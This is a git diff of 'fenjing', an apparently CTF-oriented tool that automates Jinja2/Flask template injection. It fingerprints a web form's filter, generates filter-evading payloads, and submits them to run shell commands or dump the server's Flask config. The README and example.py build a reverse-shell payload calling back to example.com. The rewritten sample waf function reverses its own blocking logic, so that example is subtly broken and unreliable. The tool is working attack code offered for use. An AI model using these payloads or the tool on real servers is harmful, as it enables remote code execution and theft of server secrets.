diff --git a/README.md b/README.md index c22ecae..4cc6122 100755 --- a/README.md +++ b/README.md @@ -6,7 +6,7 @@ ## 演示 -![CTFShow web365](assets/demo.webp) +![demo](assets/demo.webp) ## 快速上手 @@ -138,6 +138,19 @@ Options: --interval FLOAT 每次请求的间隔 --user-agent TEXT 请求时使用的User Agent --help Show this message and exit. + +Usage: python -m fenjing get-config [OPTIONS] + + 攻击指定的表单,并获得目标服务器的flask config + +Options: + -u, --url TEXT form所在的URL + -a, --action TEXT form的action,默认为当前路径 + -m, --method TEXT form的提交方式,默认为POST + -i, --inputs TEXT form的参数,以逗号分隔 + --interval FLOAT 每次请求的间隔 + --user-agent TEXT 请求时使用的User Agent + --help Show this message and exit. ``` ### 作为python库使用 @@ -145,28 +158,25 @@ Options: 参考[example.py](example.py) ```python -from fenjing import exec_cmd_payload - +from fenjing import exec_cmd_payload, config_payload import logging - logging.basicConfig(level = logging.INFO) def waf(s: str): blacklist = [ - "config", "self", "g", "os", "class", "length", "mro", "base", "request", "lipsum", + "config", "self", "g", "os", "class", "length", "mro", "base", "lipsum", "[", '"', "'", "_", ".", "+", "~", "{{", "0", "1", "2", "3", "4", "5", "6", "7", "8", "9", "0","1","2","3","4","5","6","7","8","9" ] + return all(word in s for word in blacklist) - for word in blacklist: - if word in s: - return False - return True - -payload, _ = exec_cmd_payload(waf, "bash -c \"bash -i >& /dev/tcp/example.com/3456 0>&1\"") +if __name__ == "__main__": + shell_payload, _ = exec_cmd_payload(waf, "bash -c \"bash -i >& /dev/tcp/example.com/3456 0>&1\"") + config_payload = config_payload(waf) -print(payload) + print(f"{shell_payload=}") + print(f"{config_payload=}") ``` diff --git a/example.py b/example.py index 30590d3..596e0a3 100755 --- a/example.py +++ b/example.py @@ -1,22 +1,20 @@ -from fenjing import exec_cmd_payload - +from fenjing import exec_cmd_payload, config_payload import logging - logging.basicConfig(level = logging.INFO) def waf(s: str): blacklist = [ - "config", "self", "g", "os", "class", "length", "mro", "base", "request", "lipsum", + "config", "self", "g", "os", "class", "length", "mro", "base", "lipsum", "[", '"', "'", "_", ".", "+", "~", "{{", "0", "1", "2", "3", "4", "5", "6", "7", "8", "9", "0","1","2","3","4","5","6","7","8","9" ] + return all(word in s for word in blacklist) - for word in blacklist: - if word in s: - return False - return True +if __name__ == "__main__": + shell_payload, _ = exec_cmd_payload(waf, "bash -c \"bash -i >& /dev/tcp/example.com/3456 0>&1\"") + config_payload = config_payload(waf) -payload, _ = exec_cmd_payload(waf, "bash -c \"bash -i >& /dev/tcp/example.com/3456 0>&1\"") + print(f"{shell_payload=}") + print(f"{config_payload=}") -print(payload) diff --git a/fenjing/__init__.py b/fenjing/__init__.py index 3c9b902..ab5bb88 100755 --- a/fenjing/__init__.py +++ b/fenjing/__init__.py @@ -1,4 +1,5 @@ from . import exceptions, payload_gen from .shell_payload import exec_cmd_payload +from .config_payload import config_payload from .int_vars import get_useable_int_vars from .form import Form, fill_form diff --git a/fenjing/cli.py b/fenjing/cli.py index 0cb9709..4c529f3 100644 --- a/fenjing/cli.py +++ b/fenjing/cli.py @@ -6,8 +6,10 @@ from .form import Form from .form_cracker import FormCracker +from .full_payload_gen import FullPayloadGen from .scan_url import yield_form -from .requester import Requester, DEFAULT_USER_AGENT +from .requester import Requester +from .const import DEFAULT_USER_AGENT, OS_POPEN_READ, CONFIG from .colorize import colored import click @@ -28,8 +30,8 @@ logger = logging.getLogger("cli") -def cmd_exec(cmd, cracker: FormCracker, field: str, payload_gen: Callable): - payload = payload_gen(cmd) +def cmd_exec(cmd, cracker: FormCracker, field: str, full_payload_gen: FullPayloadGen): + payload = full_payload_gen.generate(OS_POPEN_READ, cmd) logger.info(f"Submit payload {colored('blue', payload)}") r = cracker.submit( {field: payload}) @@ -63,6 +65,52 @@ def main(): pass +@main.command() +@click.option("--url", "-u", help="form所在的URL") +@click.option("--action", "-a", default=None, help="form的action,默认为当前路径") +@click.option("--method", "-m", default="POST", help="form的提交方式,默认为POST") +@click.option("--inputs", "-i", help="form的参数,以逗号分隔") +@click.option("--interval", default=0.0, help="每次请求的间隔") +@click.option("--user-agent", default=DEFAULT_USER_AGENT, help="请求时使用的User Agent") +def get_config( + url: str, + action: str, + method: str, + inputs: str, + interval: float, + user_agent: str): + """ + 攻击指定的表单,并获得目标服务器的flask config + """ + print(TITLE) + assert all(param is not None for param in [ + url, inputs]), "Please check your param" + form = Form( + action=action or urlparse(url).path, + method=method, + inputs=inputs.split(",") + ) + requester = Requester( + interval=interval, + user_agent=user_agent + ) + cracker = FormCracker( + url=url, + form=form, + requester=requester + ) + result = cracker.crack() + if result is None: + logger.warning("Test form failed...") + return + full_payload_gen, field = result + payload = full_payload_gen.generate(CONFIG) + r = cracker.submit( + {field: payload}) + + print(r.text if r is not None else None) + logger.warning("Bye!") + @main.command() @click.option("--url", "-u", help="form所在的URL") @click.option("--action", "-a", default=None, help="form的action,默认为当前路径") @@ -90,20 +138,22 @@ def crack( method=method, inputs=inputs.split(",") ) - requester = Requester(interval=interval, user_agent=user_agent) - cracker = FormCracker(url=url, form=form, requester=requester) + requester = Requester( + interval=interval, + user_agent=user_agent + ) + cracker = FormCracker( + url=url, + form=form, + requester=requester + ) result = cracker.crack() if result is None: logger.warning("Test form failed...") return - payload_gen, field = result + full_payload_gen, field = result cmd_exec_func = partial(cmd_exec, cracker=cracker, - field=field, payload_gen=payload_gen) - # def cmd_exec_func(cmd): - # r = cracker.submit( - # {field: payload_gen(cmd)}) - # assert r is not None - # return r.text + field=field, full_payload_gen=full_payload_gen) if exec_cmd == "": interact(cmd_exec_func) else: @@ -128,9 +178,9 @@ def scan(url, exec_cmd, interval, user_agent): result = cracker.crack() if result is None: continue - payload_gen, field = result + full_payload_gen, field = result cmd_exec_func = partial(cmd_exec, cracker=cracker, - field=field, payload_gen=payload_gen) + field=field, full_payload_gen=full_payload_gen) # def cmd_exec_func(cmd): # r = cracker.submit( # {field: payload_gen(cmd)}) diff --git a/fenjing/colorize.py b/fenjing/colorize.py index 7144fa4..69ef540 100644 --- a/fenjing/colorize.py +++ b/fenjing/colorize.py @@ -29,4 +29,4 @@ def colored(color, text, bold=False): format_str = "\033[1;{};{}m{}\033[0m" if color not in colors: color = "blue" - return format_str.format(int(bold), colors[color], text) \ No newline at end of file + return format_str.format(int(bold), colors[color], text) diff --git a/fenjing/config_payload.py b/fenjing/config_payload.py new file mode 100644 index 0000000..e7f2b53 --- /dev/null +++ b/fenjing/config_payload.py @@ -0,0 +1,26 @@ +from typing import Callable, Tuple, Dict +from .const import CONFIG +from .full_payload_gen import FullPayloadGen + +full_payload_store: Dict[int, FullPayloadGen] = {} + +def config_payload(waf_func: Callable[[str, ], bool]) -> str | None: + """根据提供的waf函数生成读取config的payload + + Args: + waf_func (Callable[[str, ], bool]): waf函数,判断提供的payload能否通过waf, 能则返回True + + Returns: + str|None: payload + """ + full_payload = None + if id(waf_func) not in full_payload_store: + full_payload = FullPayloadGen(waf_func) + full_payload_store[id(waf_func)] = full_payload + else: + full_payload = full_payload_store[id(waf_func)] + payload, will_print = full_payload.generate(CONFIG) + if not will_print: + return None + return payload + diff --git a/fenjing/const.py b/fenjing/const.py new file mode 100644 index 0000000..39520b3 --- /dev/null +++ b/fenjing/const.py @@ -0,0 +1,52 @@ +DEFAULT_USER_AGENT = "Fenjing/0.1" + +LITERAL = "literal" +UNSATISFIED = "unsatisfied" +ZERO = "zero" +POSITIVE_INTEGER = "positive_integer" +INTEGER = "integer" +STRING_STRING_CONCNAT = "string_string_concat" +STRING_PERCENT = "string_percent" +STRING_PERCENT_LOWER_C = "string_percent_lower_c" +STRING_UNDERLINE = "string_underline" +STRING_LOWERC = "string_lower_c" +STRING_MANY_PERCENT_LOWER_C = "string_many_percent_lower_c" +STRING = "string" +FORMULAR_SUM = "formular_sum" +ATTRIBUTE = "attribute" +ITEM = "item" +CLASS_ATTRIBUTE = "class_attribute" +CHAINED_ATTRIBUTE_ITEM = "chained_attribute_item" +EVAL_FUNC = "eval_func" +EVAL = "eval" +CONFIG = "config" +MODULE_OS = "module_os" +OS_POPEN_OBJ = "os_popen_obj" +OS_POPEN_READ = "os_popen_read" + +GEN_TYPES = [ + "literal", + "unsatisfied", + "zero", + "positive_integer", + "integer", + "string_string_concat", + "string_percent", + "string_percent_lower_c", + "string_underline", + "string_lower_c", + "string_many_percent_lower_c", + "string", + "formular_sum", + "attribute", + "item", + "class_attribute", + "chained_attribute_item", + "eval_func", + "eval", + "config", + "module_os", + "os_popen_obj", + "os_popen_read", +] + diff --git a/fenjing/exceptions.py b/fenjing/exceptions.py index 27c5e6e..4dae78a 100755 --- a/fenjing/exceptions.py +++ b/fenjing/exceptions.py @@ -1,2 +1,2 @@ class NotTested(Exception): - pass \ No newline at end of file + pass diff --git a/fenjing/form.py b/fenjing/form.py index 8891c25..d361551 100644 --- a/fenjing/form.py +++ b/fenjing/form.py @@ -9,6 +9,7 @@ logger = logging.getLogger("utils.form") + def Form(*, action: str, inputs: Iterable, method: str = "POST") -> Dict[str, Any]: """根据输入生成一个表单 @@ -74,7 +75,7 @@ def random_fill(form): } -def fill_form(url, form, form_inputs = None, random_fill_other = True): +def fill_form(url, form, form_inputs=None, random_fill_other=True): """根据输入填充表单,返回给requests库的参数 Args: diff --git a/fenjing/form_cracker.py b/fenjing/form_cracker.py index 152bbaa..38a766d 100644 --- a/fenjing/form_cracker.py +++ b/fenjing/form_cracker.py @@ -1,17 +1,16 @@ -from urllib.parse import urlparse -from collections import Counter, namedtuple -from functools import lru_cache +from collections import namedtuple import logging -from typing import List, Dict, Tuple, Callable, Any +from typing import List, Dict, Any -from .form import Form, random_fill, fill_form +from .form import random_fill, fill_form from .requester import Requester from .colorize import colored -from .shell_payload import exec_cmd_payload - +from .const import OS_POPEN_READ +from .waf_func_gen import WafFuncGen +from .full_payload_gen import FullPayloadGen logger = logging.getLogger("form_cracker") -Result = namedtuple("Result", "payload_generate_func input_field") +Result = namedtuple("Result", "full_payload_gen input_field") class FormCracker: @@ -29,13 +28,9 @@ class FormCracker: def __init__( self, + url: str, form: Dict[str, Any], - method: str = "POST", - inputs: List[str] | None = None, - url: str | None = None, - action: str | None = None, - requester: Requester | None = None, - request_interval: float = 0.0 + requester: Requester, ): """生成用于攻击form的类 @@ -49,22 +44,9 @@ def __init__( request_interval (float, optional): 请求的间隔,用于构造requester. Defaults to 0. """ self.url = url - if form: - self.form = form - else: - assert method is not None and inputs is not None and url is not None, \ - "[method, inputs, url] should not be None!" # for typing - self.form = Form( - method=method, - inputs=inputs, - action=action or urlparse(url).path - ) - if requester: - self.req = requester - else: - self.req = Requester( - interval=request_interval - ) + self.form = form + self.req = requester + self.waf_func_gen = WafFuncGen(self.url, self.form, self.req) def vulunable_inputs(self) -> List[str]: """解析出form中有回显的input @@ -100,30 +82,6 @@ def submit(self, inputs: dict): return self.req.request( **fill_form(self.url, self.form, inputs)) - def waf_page_hash(self, input_field: str): - """使用危险的payload测试对应的input,得到一系列响应后,求出响应中最常见的几个hash - - Args: - input_field (str): 需要测试的input - - Returns: - List[int]: payload被waf后页面对应的hash - """ - resps = {} - for keyword in self.dangerous_keywords: - logger.info( - f"Testing dangerous keyword {colored('yellow', repr(keyword * 3))}") - resps[keyword] = self.submit({input_field: keyword * 3}) - # resps = { - # keyword: self.submit({input_field: keyword * 3}) - # for keyword in self.dangerous_keywords - # } - hashes = [ - hash(r.text) for keyword, r in resps.items() - if r is not None and r.status_code != 500 and keyword not in r.text - ] - return [pair[0] for pair in Counter(hashes).most_common(2)] - def crack_inputs(self, input_field: str) -> Result | None: """攻击对应的input @@ -135,15 +93,10 @@ def crack_inputs(self, input_field: str) -> Result | None: """ logger.info(f"Testing {colored('yellow', input_field)}") - waf_hashes = self.waf_page_hash(input_field) - - @lru_cache(1000) - def waf_func(value): - r = self.submit({input_field: value}) - assert r is not None - return hash(r.text) not in waf_hashes - - payload, will_echo = exec_cmd_payload(waf_func, self.test_cmd) + waf_func = self.waf_func_gen.generate(input_field) + full_payload_gen = FullPayloadGen(waf_func) + payload, will_echo = full_payload_gen.generate(OS_POPEN_READ, self.test_cmd) + # payload, will_echo = exec_cmd_payload(waf_func, self.test_cmd) if payload is None: return None if will_echo: @@ -158,8 +111,7 @@ def waf_func(value): logger.info( f"{colored('yellow', 'Test Payload Failed', bold=True)}! Generated payloads might be useless.") return Result( - payload_generate_func=( - lambda cmd: exec_cmd_payload(waf_func, cmd)[0]), + full_payload_gen=full_payload_gen, input_field=input_field ) else: @@ -167,8 +119,7 @@ def waf_func(value): f"Input {input_field} looks great, but we WON'T SEE the execution result! " + "You can try generating payloads anyway.") return Result( - payload_generate_func=( - lambda cmd: exec_cmd_payload(waf_func, cmd)[0]), + full_payload_gen=full_payload_gen, input_field=input_field ) @@ -189,3 +140,179 @@ def crack(self) -> Result | None: return result logger.warning(f"Failed...") return None + +# class FormCracker: +# """ +# 对指定的文档进行攻击 +# """ +# dangerous_keywords = [ +# "config", "self", "os", "class", "mro", "base", "request", +# "attr", "open", "system", +# "[", '"', "'", "_", ".", "+", "{{", "|", +# "0", "1", "2", +# ] +# test_cmd = "echo f3n j1ng;" +# test_result = "f3n j1ng" + +# def __init__( +# self, +# form: Dict[str, Any], +# method: str = "POST", +# inputs: List[str] | None = None, +# url: str | None = None, +# action: str | None = None, +# requester: Requester | None = None, +# request_interval: float = 0.0 +# ): +# """生成用于攻击form的类 + +# Args: +# form (dict): 解析后的form元素 +# method (str, optional): form的提交方法. Defaults to "POST". +# inputs (list, optional): form的输入. Defaults to None. +# url (str, optional): form所在的url. Defaults to None. +# action (str, optional): form的action, 为None时和url相同. Defaults to None. +# requester (Requester, optional): 用于发出请求的requester,为None时自动构造. Defaults to None. +# request_interval (float, optional): 请求的间隔,用于构造requester. Defaults to 0. +# """ +# self.url = url +# if form: +# self.form = form +# else: +# assert method is not None and inputs is not None and url is not None, \ +# "[method, inputs, url] should not be None!" # for typing +# self.form = Form( +# method=method, +# inputs=inputs, +# action=action or urlparse(url).path +# ) +# if requester: +# self.req = requester +# else: +# self.req = Requester( +# interval=request_interval +# ) + +# def vulunable_inputs(self) -> List[str]: +# """解析出form中有回显的input + +# Returns: +# List[str]: 所有有回显的input name +# """ +# fill_dict = random_fill(self.form) +# r = self.req.request( +# **fill_form( +# self.url, +# self.form, +# form_inputs=fill_dict)) +# assert r is not None +# return [ +# k for k, v in fill_dict.items() +# if v in r.text +# ] + +# def submit(self, inputs: dict): +# """根据inputs提交form + +# Args: +# inputs (dict): 需要提交的input + +# Returns: +# requests.Response: 返回的reponse元素 +# """ +# all_length = sum(len(v) for v in inputs.values()) +# if all_length > 2048 and self.form["method"] == "GET": +# logger.warning( +# f"inputs are extremely long (len={all_length}) that the request might fail") +# return self.req.request( +# **fill_form(self.url, self.form, inputs)) + +# def waf_page_hash(self, input_field: str): +# """使用危险的payload测试对应的input,得到一系列响应后,求出响应中最常见的几个hash + +# Args: +# input_field (str): 需要测试的input + +# Returns: +# List[int]: payload被waf后页面对应的hash +# """ +# resps = {} +# for keyword in self.dangerous_keywords: +# logger.info( +# f"Testing dangerous keyword {colored('yellow', repr(keyword * 3))}") +# resps[keyword] = self.submit({input_field: keyword * 3}) +# # resps = { +# # keyword: self.submit({input_field: keyword * 3}) +# # for keyword in self.dangerous_keywords +# # } +# hashes = [ +# hash(r.text) for keyword, r in resps.items() +# if r is not None and r.status_code != 500 and keyword not in r.text +# ] +# return [pair[0] for pair in Counter(hashes).most_common(2)] + +# def crack_inputs(self, input_field: str) -> Result | None: +# """攻击对应的input + +# Args: +# input_field (str): 需要攻击的input + +# Returns: +# Result | None: 对应的payload生成函数,以及对应的input +# """ +# logger.info(f"Testing {colored('yellow', input_field)}") + +# waf_hashes = self.waf_page_hash(input_field) + +# @lru_cache(1000) +# def waf_func(value): +# r = self.submit({input_field: value}) +# assert r is not None +# return hash(r.text) not in waf_hashes + +# payload, will_echo = exec_cmd_payload(waf_func, self.test_cmd) +# if payload is None: +# return None +# if will_echo: +# logger.info( +# f"Input {colored('yellow', repr(input_field))} looks great, testing generated payload.") +# r = self.submit({input_field: payload}) +# assert r is not None +# if self.test_result in r.text: +# logger.info( +# f"{colored('green', 'Success!')} Now we can generate payloads.") +# else: +# logger.info( +# f"{colored('yellow', 'Test Payload Failed', bold=True)}! Generated payloads might be useless.") +# return Result( +# payload_generate_func=( +# lambda cmd: exec_cmd_payload(waf_func, cmd)[0]), +# input_field=input_field +# ) +# else: +# logger.info( +# f"Input {input_field} looks great, but we WON'T SEE the execution result! " + +# "You can try generating payloads anyway.") +# return Result( +# payload_generate_func=( +# lambda cmd: exec_cmd_payload(waf_func, cmd)[0]), +# input_field=input_field +# ) + +# def crack(self) -> Result | None: +# """攻击表单 + +# Returns: +# Result | None: 对应的payload生成函数,以及对应的input +# """ +# logger.info(f"Start cracking {self.form}") +# vulunables = self.vulunable_inputs() +# logger.info( +# f"These inputs might be vulunable: {colored('yellow', repr(vulunables))}") + +# for input_field in vulunables: +# result = self.crack_inputs(input_field) +# if result: +# return result +# logger.warning(f"Failed...") +# return None diff --git a/fenjing/full_payload_gen.py b/fenjing/full_payload_gen.py new file mode 100755 index 0000000..5697438 --- /dev/null +++ b/fenjing/full_payload_gen.py @@ -0,0 +1,94 @@ +from typing import Callable, List, Tuple +import logging + +from . import payload_gen +from .int_vars import get_useable_int_vars +from .colorize import colored + +logger = logging.getLogger("shell_payload") + + +def get_int_context(waf_func): + ints, var_names, payload = get_useable_int_vars(waf_func) + if len(ints) == 0: + logger.warning("No IntVars For YOU!") + return payload, dict(zip(var_names, ints)) + + +def get_str_context(waf_func): + str_vars = [ + ("un", "_", "{%set un=(lipsum|escape|batch(22)|list|first|last)%}"), + ("perc", "%", "{%set perc=(lipsum[(lipsum|escape|batch(22)|list|first|last)*2" + + "+dict(globals=x)|join+(lipsum|escape|batch(22)|list|first|last)*2]" + + "[(lipsum|escape|batch(22)|list|first|last)*2+dict(builtins=x)" + + "|join+(lipsum|escape|batch(22)|list|first|last)*2][dict(chr=x)|join](37))%}") + ] + str_vars = [tpl for tpl in str_vars if waf_func(tpl[2])] + return "".join(payload for _, _, payload in str_vars), {var_name: var_value for var_name, var_value, _ in str_vars} + + +def get_outer_pattern(waf_func): + outer_payloads = [ + ("{{}}", "{{PAYLOAD}}", True), + ("{%print()%}", "{%print(PAYLOAD)%}", True), + ("{%if()%}{%endif%}", "{%if(PAYLOAD)%}{%endif%}", False), + ("{% set x= %}", "{% set x=PAYLOAD %}", False), + ] + for test_payload, outer_pattern, will_print in outer_payloads: + if waf_func(test_payload): + return outer_pattern, will_print + else: + logger.warning("LOTS OF THINGS is being waf, NOTHING FOR YOU!") + return None, None + + +class FullPayloadGen: + def __init__(self, waf_func): + self.waf_func = waf_func + self.prepared = False + + def do_prepare(self) -> bool: + + if self.prepared: + return True + + int_payload, int_context = get_int_context(self.waf_func) + str_payload, str_context = get_str_context(self.waf_func) + + self.context_payload, self.context = int_payload + \ + str_payload, {**int_context, **str_context} + self.outer_pattern, self.will_print = get_outer_pattern(self.waf_func) + if not self.outer_pattern: + return False + if self.will_print: + logger.info(f"use {colored('blue', self.outer_pattern)}") + else: + logger.warning( + f"use {colored('blue', self.outer_pattern)}, which {colored('red', 'will not print')} your result!") + self.prepared = True + return True + + def generate(self, gen_type, *args) -> Tuple[str | None, bool | None]: + + if not self.prepared and not self.do_prepare(): + return None, None + + inner_payload = payload_gen.generate( + gen_type, + *args, + waf_func=self.waf_func, + context=self.context + ) + + if inner_payload is None: + logger.warning("Bypassing WAF Failed.") + return None, None + + assert isinstance(self.outer_pattern, str) + + return ( + self.context_payload + self.outer_pattern.replace("PAYLOAD", inner_payload), + self.will_print + ) + + diff --git a/fenjing/int_vars.py b/fenjing/int_vars.py index 99df8a7..f8d8d6f 100755 --- a/fenjing/int_vars.py +++ b/fenjing/int_vars.py @@ -2,13 +2,15 @@ IntVars = namedtuple("IntVars", "payload ints var_names") + def int_var(payload, i, var_name): return IntVars( - payload = payload, - ints = [i, ], - var_names = [var_name, ] + payload=payload, + ints=[i, ], + var_names=[var_name, ] ) + int_vars_list = [ IntVars( payload=( @@ -68,8 +70,10 @@ def int_var(payload, i, var_name): "zzeb" ] ), - int_var("{%set zols=lipsum|escape|urlencode|list|escape|urlencode|count%}", 2015, "zols"), - int_var("{%set ltr={}|escape|urlencode|list|escape|urlencode|count%}", 178, "ltr"), + int_var( + "{%set zols=lipsum|escape|urlencode|list|escape|urlencode|count%}", 2015, "zols"), + int_var( + "{%set ltr={}|escape|urlencode|list|escape|urlencode|count%}", 178, "ltr"), int_var("{%set lea=namespace|escape|urlencode|escape|urlencode|urlencode|urlencode|count%}", 134, "lea"), int_var("{%set lel=cycler|escape|urlencode|escape|urlencode|escape|urlencode|escape|urlencode|count%}", 131, "lel"), int_var("{%set qo=namespace|escape|urlencode|escape|urlencode|count%}", 90, "qo"), diff --git a/fenjing/payload_gen.py b/fenjing/payload_gen.py index 41edd29..0a99238 100644 --- a/fenjing/payload_gen.py +++ b/fenjing/payload_gen.py @@ -4,36 +4,13 @@ import time import logging from .colorize import colored - - -LITERAL = "literal" -UNSATISFIED = "unsatisfied" -ZERO = "zero" -POSITIVE_INTEGER = "positive_integer" -INTEGER = "integer" -STRING_STRING_CONCNAT = "string_string_concat" -STRING_PERCENT = "string_percent" -STRING_PERCENT_LOWER_C = "string_percent_lower_c" -STRING_UNDERLINE = "string_underline" -STRING_LOWERC = "string_lower_c" -STRING_MANY_PERCENT_LOWER_C = "string_many_percent_lower_c" -STRING = "string" -FORMULAR_SUM = "formular_sum" -ATTRIBUTE = "attribute" -ITEM = "item" -CLASS_ATTRIBUTE = "class_attribute" -CHAINED_ATTRIBUTE_ITEM = "chained_attribute_item" -EVAL_FUNC = "eval_func" -EVAL = "eval" -CONFIG = "config" -MODULE_OS = "module_os" -OS_POPEN_OBJ = "os_popen_obj" -OS_POPEN_READ = "os_popen_read" +from .const import * req_gens: DefaultDict[str, List[Callable]] = defaultdict(list) used_count = defaultdict(int) logger = logging.getLogger("payload_gen") + def req_gen(f): gen_type = re.match("gen_([a-z_]+)_([a-z0-9]+)", f.__name__) if not gen_type: @@ -63,7 +40,8 @@ def add_cache(self, gen_type, *args, result=None): def count_success(self, gen_type, req_gen_func_name): used_count[req_gen_func_name] += 1 - req_gens[gen_type].sort(key = (lambda gen_func: used_count[gen_func.__name__]), reverse=True) + req_gens[gen_type].sort( + key=(lambda gen_func: used_count[gen_func.__name__]), reverse=True) def generate_by_req_list(self, req_list): payload = "" @@ -112,24 +90,26 @@ def default_generate(self, gen_type: str, *args): self.add_cache(gen_type, *args, result=payload) if gen_type in (INTEGER, STRING) and payload != str(args[0]): logger.info("{great}, {gen_type}({args_repl}) can be {payload}".format( - great = colored("green", "Great"), - gen_type = colored("yellow", gen_type, bold = True), - args_repl = colored("yellow", ", ".join(repr(arg) for arg in args)), - payload = colored("blue", payload) + great=colored("green", "Great"), + gen_type=colored("yellow", gen_type, bold=True), + args_repl=colored("yellow", ", ".join(repr(arg) + for arg in args)), + payload=colored("blue", payload) )) elif gen_type in (EVAL_FUNC, EVAL, CONFIG, MODULE_OS, OS_POPEN_OBJ, OS_POPEN_READ): logger.info("{great}, we generate {gen_type}({args_repl})".format( - great = colored("green", "Great"), - gen_type = colored("yellow", gen_type, bold = True), - args_repl = colored("yellow", ", ".join(repr(arg) for arg in args)), + great=colored("green", "Great"), + gen_type=colored("yellow", gen_type, bold=True), + args_repl=colored("yellow", ", ".join(repr(arg) + for arg in args)), )) # logger.warning(f"{log.colored('green', gen_type.upper())} {args_repl} should be {log.colored('blue', payload)}") return payload logger.warning("{failed} generating {gen_type}({args_repl})".format( - failed = colored("red", "failed"), - gen_type = gen_type, - args_repl = ", ".join(repr(arg) for arg in args), + failed=colored("red", "failed"), + gen_type=gen_type, + args_repl=", ".join(repr(arg) for arg in args), )) self.add_cache(gen_type, *args, result=None) return None @@ -138,6 +118,7 @@ def generate(self, gen_type, *args): generate_func = self.generate_funcs[gen_type] if gen_type in self.generate_funcs else self.default_generate return generate_func(gen_type, *args) + def generate(gen_type, *args, waf_func: Callable, context: dict | None = None) -> str | None: payload_generator = PayloadGenerator(waf_func, context) return payload_generator.generate(gen_type, *args) diff --git a/fenjing/requester.py b/fenjing/requester.py index 884e363..9b75e06 100644 --- a/fenjing/requester.py +++ b/fenjing/requester.py @@ -2,9 +2,10 @@ import logging import traceback import time +from .const import DEFAULT_USER_AGENT logger = logging.getLogger("requester") -DEFAULT_USER_AGENT = "Fenjing/0.1" + class Requester: def __init__( diff --git a/fenjing/shell_payload.py b/fenjing/shell_payload.py old mode 100755 new mode 100644 index 14505a4..f780f90 --- a/fenjing/shell_payload.py +++ b/fenjing/shell_payload.py @@ -1,33 +1,10 @@ -from typing import Callable, List, Tuple -import logging +from typing import Callable, Tuple, Dict +from .const import OS_POPEN_READ +from .full_payload_gen import FullPayloadGen -from . import payload_gen -from .int_vars import get_useable_int_vars -from .colorize import colored +full_payload_store: Dict[int, FullPayloadGen] = {} -logger = logging.getLogger("shell_payload") - - -def get_int_context(waf_func): - ints, var_names, payload = get_useable_int_vars(waf_func) - if len(ints) == 0: - logger.warning("No IntVars For YOU!") - return payload, dict(zip(var_names, ints)) - -def get_str_context(waf_func): - str_vars = [ - ("un", "_", "{%set un=(lipsum|escape|batch(22)|list|first|last)%}"), - ("perc", "%", "{%set perc=(lipsum[(lipsum|escape|batch(22)|list|first|last)*2" + - "+dict(globals=x)|join+(lipsum|escape|batch(22)|list|first|last)*2]" + - "[(lipsum|escape|batch(22)|list|first|last)*2+dict(builtins=x)" + - "|join+(lipsum|escape|batch(22)|list|first|last)*2][dict(chr=x)|join](37))%}") - ] - str_vars = [tpl for tpl in str_vars if waf_func(tpl[2])] - return "".join(payload for _, _, payload in str_vars), {var_name: var_value for var_name, var_value, _ in str_vars} - - - -def exec_cmd_payload(waf_func: Callable[[str, ], bool], cmd: str) -> Tuple[str|None, bool|None]: +def exec_cmd_payload(waf_func: Callable[[str, ], bool], cmd: str) -> Tuple[str | None, bool | None]: """根据提供的waf函数为一个shell命令生成对应的payload Args: @@ -37,38 +14,11 @@ def exec_cmd_payload(waf_func: Callable[[str, ], bool], cmd: str) -> Tuple[str|N Returns: Tuple[str|None, bool|None]: 对应的payload, 以及payload是否能生成回显 """ - int_payload, int_context = get_int_context(waf_func) - str_payload, str_context = get_str_context(waf_func) - before_payload, context = int_payload + str_payload, {**int_context, **str_context} - outer_payloads = [ - ("{{}}", "{{PAYLOAD}}", True), - ("{%print()%}", "{%print(PAYLOAD)%}", True), - ("{%if()%}{%endif%}", "{%if(PAYLOAD)%}{%endif%}", False), - ("{% set x= %}", "{% set x=PAYLOAD %}", False), - ] - outer_pattern, will_print = None, None - for test_payload, outer_pattern, will_print in outer_payloads: - if waf_func(test_payload): - break + full_payload = None + if id(waf_func) not in full_payload_store: + full_payload = FullPayloadGen(waf_func) + full_payload_store[id(waf_func)] = full_payload else: - logger.warning("LOTS OF THINGS is being waf, NOTHING FOR YOU!") - return None, None - - if will_print: - logger.info(f"use {colored('blue', outer_pattern)}") - else: - logger.warning(f"use {colored('blue', outer_pattern)}, which {colored('red', 'will not print')} your result!") - - - inner_payload = payload_gen.generate( - payload_gen.OS_POPEN_READ, - cmd, - waf_func=waf_func, - context=context - ) - if inner_payload is None: - - logger.warning("Bypassing WAF Failed.") - return None, None + full_payload = full_payload_store[id(waf_func)] + return full_payload.generate(OS_POPEN_READ, cmd) - return before_payload + outer_pattern.replace("PAYLOAD", inner_payload), will_print diff --git a/fenjing/waf_func_gen.py b/fenjing/waf_func_gen.py new file mode 100644 index 0000000..9df99fa --- /dev/null +++ b/fenjing/waf_func_gen.py @@ -0,0 +1,89 @@ +from urllib.parse import urlparse +from collections import Counter, namedtuple +from functools import lru_cache +import logging +from typing import List, Dict, Tuple, Callable, Any + +from .form import Form, random_fill, fill_form +from .requester import Requester +from .colorize import colored + + +logger = logging.getLogger("waf_func_gen") +Result = namedtuple("Result", "payload_generate_func input_field") + + +class WafFuncGen: + """ + 根据指定的表单生成对应的WAF函数 + """ + dangerous_keywords = [ + "config", "self", "os", "class", "mro", "base", "request", + "attr", "open", "system", + "[", '"', "'", "_", ".", "+", "{{", "|", + "0", "1", "2", + ] + + def __init__( + self, + url: str, + form: Dict[str, Any], + requester: Requester, + ): + """根据指定的表单生成对应的WAF函数 + + Args: + url (str, optional): form所在的url. Defaults to None. + form (dict): 解析后的form元素 + requester (Requester, optional): 用于发出请求的requester,为None时自动构造. Defaults to None. + """ + self.url = url + self.form = form + self.req = requester + + + def submit(self, inputs: dict): + """根据inputs提交form + + Args: + inputs (dict): 需要提交的input + + Returns: + requests.Response: 返回的reponse元素 + """ + all_length = sum(len(v) for v in inputs.values()) + if all_length > 2048 and self.form["method"] == "GET": + logger.warning( + f"inputs are extremely long (len={all_length}) that the request might fail") + return self.req.request( + **fill_form(self.url, self.form, inputs)) + + def waf_page_hash(self, input_field: str): + """使用危险的payload测试对应的input,得到一系列响应后,求出响应中最常见的几个hash + + Args: + input_field (str): 需要测试的input + + Returns: + List[int]: payload被waf后页面对应的hash + """ + resps = {} + for keyword in self.dangerous_keywords: + logger.info( + f"Testing dangerous keyword {colored('yellow', repr(keyword * 3))}") + resps[keyword] = self.submit({input_field: keyword * 3}) + hashes = [ + hash(r.text) for keyword, r in resps.items() + if r is not None and r.status_code != 500 and keyword not in r.text + ] + return [pair[0] for pair in Counter(hashes).most_common(2)] + + def generate(self, input_field): + waf_hashes = self.waf_page_hash(input_field) + + @lru_cache(1000) + def waf_func(value): + r = self.submit({input_field: value}) + assert r is not None + return hash(r.text) not in 